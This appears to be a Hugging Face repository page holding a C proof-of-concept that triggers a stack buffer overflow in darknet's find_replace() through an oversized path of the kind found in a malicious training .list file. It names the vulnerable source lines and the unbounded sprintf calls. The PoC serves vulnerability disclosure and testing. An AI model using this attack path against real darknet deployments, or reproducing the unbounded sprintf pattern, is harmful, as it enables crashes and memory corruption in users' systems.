Hugging Face's logo

0xiviel
/
poc-darknet-sprintf-stack-bof

Model card Files
xet
 Community
poc-darknet-sprintf-stack-bof / poc_sprintf_overflow.c
0xiviel's picture
0xiviel
Upload poc_sprintf_overflow.c with huggingface_hub
de98a49 verified
raw
history blame contribute delete
2.54 kB
/*
 * PoC: Stack buffer overflow in find_replace() — src/utils.c:216-230
 *
 * Vulnerability: find_replace() uses a fixed char buffer[4096] with sprintf()
 * and has no bounds checking. When called with a string > 4096 chars,
 * sprintf(buffer, "%s", str) overflows the stack buffer.
 *
 * Attack vector: Training data paths from .list files are passed to
 * find_replace() via fill_truth_detection() (data.c:450) and
 * find_replace_paths() (data.c:56-64). A malicious .list file with
 * paths > 4096 chars triggers the overflow.
 *
 * Also: data.c:61 has char replaced[4096] — another stack buffer overflow
 * target via the same path.
 *
 * This harness demonstrates the overflow by calling find_replace() directly
 * with an oversized string, simulating what happens when darknet processes
 * a malicious training data file.
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
/* Exact copy of the vulnerable function from src/utils.c:216-230 */
void find_replace(char *str, char *orig, char *rep, char *output)
{
 char buffer[4096] = {0};
 char *p;
sprintf(buffer, "%s", str); /* OVERFLOW: str > 4096 */
 if(!(p = strstr(buffer, orig))){
 sprintf(output, "%s", str);
 return;
 }
*p = '\0';
sprintf(output, "%s%s%s", buffer, rep, p+strlen(orig));
}
int main(int argc, char **argv)
{
 /* Simulate a malicious image path from a .list file */
 /* In real darknet, this comes from fgetl() reading train.list */
 int path_len = 5000;
 if (argc > 1) path_len = atoi(argv[1]);
char *malicious_path = malloc(path_len + 1);
 memset(malicious_path, 'A', path_len);
/* Inject "images" at position 100 so find_replace has something to match */
 memcpy(malicious_path + 100, "images", 6);
/* End with a valid-looking extension */
 memcpy(malicious_path + path_len - 4, ".jpg", 4);
 malicious_path[path_len] = '\0';
printf("[*] PoC: find_replace() stack buffer overflow (src/utils.c:221)\n");
 printf("[*] Input string length: %d bytes\n", path_len);
 printf("[*] Fixed buffer size: 4096 bytes\n");
 printf("[*] Overflow: %d bytes past buffer\n", path_len - 4096);
 printf("[*] Calling find_replace()...\n");
/* This is the exact call from data.c:220 / data.c:450 */
 char labelpath[4096];
 find_replace(malicious_path, "images", "labels", labelpath);
/* Should never reach here with ASAN */
 printf("[!] If you see this, ASAN is not enabled\n");
free(malicious_path);
 return 0;
}